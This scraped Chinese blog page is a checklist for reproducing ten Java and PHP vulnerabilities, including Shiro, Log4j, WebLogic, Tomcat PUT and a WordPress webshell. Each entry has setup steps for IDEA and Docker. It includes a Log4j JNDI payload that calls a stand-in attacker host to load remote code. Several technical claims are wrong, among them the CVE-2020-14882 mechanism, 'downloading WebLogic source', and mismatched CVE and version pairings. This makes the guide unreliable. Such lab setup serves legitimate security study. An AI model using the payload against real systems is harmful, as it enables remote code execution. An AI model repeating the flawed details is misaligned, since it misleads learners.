当前位置: 首页 > wzjs >正文

思源黑体做网站软文营销的宗旨是什么

思源黑体做网站,软文营销的宗旨是什么,wordpress menu gif,学做企业网站Java漏洞复现清单及环境搭建指南(含IDEA与Docker方法) 1. Shiro反序列化漏洞 (CVE-2016-4437/CVE-2020-1957) 漏洞原理 Apache Shiro在1.2.4及以下版本中,默认使用硬编码的AES密钥进行rememberMe Cookie的加密与解密。攻击者可构造恶意序列…

Java漏洞复现清单及环境搭建指南(含IDEA与Docker方法)

1. Shiro反序列化漏洞 (CVE-2016-4437/CVE-2020-1957)
  • 漏洞原理
    Apache Shiro在1.2.4及以下版本中,默认使用硬编码的AES密钥进行rememberMe Cookie的加密与解密。攻击者可构造恶意序列化数据,通过rememberMe字段触发反序列化漏洞,执行任意代码。
  • 环境搭建
    • IDEA搭建
      1. 下载shiro-root-1.2.4源码,通过IDEA导入Maven项目。
      2. 修改pom.xml,添加依赖:
        <dependency><groupId>javax.servlet</groupId><artifactId>jstl</artifactId><version>1.2</version>
        </dependency>
        <dependency><groupId>org.apache.commons</groupId><artifactId>commons-collections4</artifactId><version>4.0</version>
        </dependency>
        
      3. 配置Tomcat服务器,运行项目。
    • Docker搭建
      git clone https://github.com/whgojp/JavaSecLab.git
      cd JavaSecLab
      mvn clean package -DskipTests
      docker-compose -p javaseclab up -d
      
      若因网络问题无法使用Docker,可使用预配置的Vmware虚拟机镜像,启动后执行以下命令:
      sudo docker start c27a2ccdc2c7
      sudo docker start 31ec50ea1ef8
      
2. Log4j远程代码执行 (CVE-2021-44228)
  • 漏洞原理
    Log4j 2在解析日志消息时,支持通过JNDI查询动态加载资源(如LDAP、RMI)。攻击者构造恶意日志消息(如${jndi:ldap://attacker.com/Exploit}),触发JNDI注入,导致远程代码执行。
  • 环境搭建
    • IDEA搭建
      1. 创建Spring Boot项目,添加Log4j 2依赖:
        <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-log4j2</artifactId>
        </dependency>
        
      2. 修改log4j2.xml,启用JNDI查询。
      3. 编写测试代码,记录包含恶意JNDI查询的日志。
    • Docker搭建
      docker run -p 8080:8080 vulfocus/log4j2-rce-demo
      
3. Nacos未授权配置管理漏洞 (CVE-2023-37280)
  • 漏洞原理
    Nacos在特定版本中,未对配置管理接口进行身份验证,攻击者可直接访问或修改配置,导致敏感信息泄露或恶意配置注入。
  • 环境搭建
    • IDEA搭建
      1. 下载Nacos源码,修改application.properties,设置nacos.core.auth.enabled=false
      2. 使用IDEA启动Nacos主程序。
    • Docker搭建
      docker run -d -p 8848:8848 --name nacos-standalone -e MODE=standalone nacos/nacos-server:2.0.0-ALPHA.1
      
4. Spring Boot Actuator未授权访问
  • 漏洞原理
    Spring Boot Actuator提供了监控与管理端点(如/actuator/env/actuator/heapdump)。若未配置访问权限,攻击者可直接访问敏感信息或执行恶意操作。
  • 环境搭建
    • IDEA搭建
      1. 克隆项目:
        git clone https://github.com/callicoder/spring-boot-actuator-demo.git
        cd spring-boot-actuator-demo
        
      2. 修改application.properties,暴露所有端点:
        management.endpoints.web.exposure.include=*
        
      3. 使用IDEA启动项目。
    • Docker搭建
      docker run -p 8080:8080 callicoder/spring-boot-actuator-demo
      
5. Swagger接口泄露漏洞
  • 漏洞原理
    Swagger UI暴露在公网且未进行访问控制,攻击者可查看API文档并直接调用敏感接口(如用户管理、数据导出等)。
  • 环境搭建
    • IDEA搭建
      1. 创建Spring Boot项目,添加Swagger依赖:
        <dependency><groupId>io.springfox</groupId><artifactId>springfox-boot-starter</artifactId><version>3.0.0</version>
        </dependency>
        
      2. 编写配置类,启用Swagger UI。
      3. 使用IDEA启动项目。
    • Docker搭建
      docker run -d -p 8080:8080 swaggerapi/swagger-ui
      
6. JBoss反序列化漏洞 (CVE-2017-12149)
  • 漏洞原理
    JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器未对输入进行安全检查,导致反序列化漏洞。攻击者可构造恶意序列化数据,触发远程代码执行。
  • 环境搭建
    • IDEA搭建
      1. 下载JBoss源码,修改web.xml,启用HttpInvoker服务。
      2. 使用IDEA启动JBoss主程序。
    • Docker搭建
      docker run -d -p 8080:8080 -p 9990:9990 jboss/wildfly
      
7. Tomcat任意文件写入漏洞 (CVE-2017-12615)
  • 漏洞原理
    Tomcat在Windows上启用HTTP PUT请求方法时,攻击者可上传恶意JSP文件,执行任意代码。
  • 环境搭建
    • IDEA搭建
      1. 下载Tomcat源码,修改web.xml,启用PUT方法。
      2. 使用IDEA启动Tomcat。
    • Docker搭建
      docker run -d -p 8080:8080 vulfocus/tomcat-cve-2017-12615
      
8. WebLogic反序列化漏洞 (CVE-2020-14882)
  • 漏洞原理
    WebLogic的T3协议在处理反序列化数据时存在缺陷,攻击者可构造恶意序列化数据,触发远程代码执行。
  • 环境搭建
    • IDEA搭建
      1. 下载WebLogic源码,修改config.xml,启用T3协议。
      2. 使用IDEA启动WebLogic主程序。
    • Docker搭建
      docker run -d -p 7001:7001 store/oracle/weblogic:12.2.1.4
      
9. ThinkPHP远程代码执行 (CVE-2018-20062)
  • 漏洞原理
    ThinkPHP框架在处理路由参数时,未对用户输入进行严格过滤,导致攻击者可构造恶意路由参数,触发远程代码执行。
  • 环境搭建
    • IDEA搭建
      1. 下载ThinkPHP源码,通过IDEA导入项目。
      2. 修改config/app.php,关闭路由安全验证。
      3. 使用IDEA启动PHP内置服务器。
    • Docker搭建
      docker run -d -p 8081:80 vulfocus/thinkphp:6.0.12
      
10. WordPress后台修改模板获取WebShell
  • 漏洞原理
    WordPress后台的模板编辑功能允许管理员直接修改PHP文件。若攻击者获取管理员权限,可通过修改模板文件植入WebShell,执行任意代码。
  • 环境搭建
    • IDEA搭建
      1. 下载WordPress源码,通过IDEA导入项目。
      2. 修改wp-config-sample.php,配置数据库连接信息,并重命名为wp-config.php
      3. 使用IDEA启动PHP内置服务器或配置外部服务器(如Apache/Nginx)。
    • Docker搭建
      docker run -d -p 80:80 -e WORDPRESS_DB_HOST=db -e WORDPRESS_DB_USER=wordpress -e WORDPRESS_DB_PASSWORD=wordpress -e WORDPRESS_DB_NAME=wordpress --link db:mysql wordpress
      docker run -d --name db -e MYSQL_ROOT_PASSWORD=root -e MYSQL_DATABASE=wordpress -e MYSQL_USER=wordpress -e MYSQL_PASSWORD=wordpress mysql:5.7
      

总结

  • 环境搭建
    • IDEA搭建:适合本地调试与代码审计,可深入理解漏洞原理与代码逻辑。
    • Docker搭建:适合快速复现漏洞,便于团队共享与自动化测试。
  • 在IDEA中使用
    • 启动项目:根据项目类型,运行main方法或配置服务器。
    • 调试与验证:使用调试工具(如IDEA内置调试器)和测试工具(如Postman、curl)验证漏洞。
    • 代码审计:结合漏洞原理,审计关键代码逻辑,理解漏洞触发条件。

通过掌握以上环境搭建方法,可高效复现与审计Java应用中的常见漏洞。

http://www.dtcms.com/wzjs/216997.html

相关文章:

  • 微信公众平台注册订阅号长春seo
  • 天津做网站的公司有哪些百度推广客户端app
  • 江苏省徐州市建设银行网站网络推广网站推广
  • 深圳百度网站优化郑州seo优化服务
  • 网站备案必须做吗临沂seo公司
  • wordpress菜单小图标不显示成都官网seo费用
  • Timeliner wordpressseo顾问是什么
  • 伊春住房和城乡建设网站seo人员的相关薪资
  • 项目招商网站大全百度风云榜小说排行榜历届榜单
  • 北京建设规划许可证网站怎样找推广平台
  • 网站开发java语言上海网站建设公司排名
  • 整站seo排名外包外贸国际网站推广
  • 线切割加工东莞网站建设技术支持全网品牌推广
  • 常州企业做网站山东网络推广网站
  • jupiter wordpress安徽360优化
  • 如何做网站页面搜索引擎优化关键词
  • 关于数据机房建设的网站南宁百度seo优化
  • 商品关键词举例长沙靠谱关键词优化服务
  • 专做温州鞋批发的网站小红书推广价目表
  • 做电台需要的文章从哪个网站找百度网络营销中心app
  • 佛山便宜网站建设现在做网络推广都有什么方式
  • 服装厂家东莞网站建设网络推广策划书
  • 广东贸易网站开发百度网络营销app
  • 怎么登陆公司网站的后台青岛新闻最新消息
  • 中小企业做网站百度竞价排名展示方式
  • 平阳手机网站制作常见的网络推广方式
  • 网站建设面谈销售话术南京seo报价
  • 网站客服的调研工作怎么做做广告推广哪个平台好
  • 263企业邮箱登录口天津外贸seo推广
  • 烟台建设工程施工图审查系统网站网站设计论文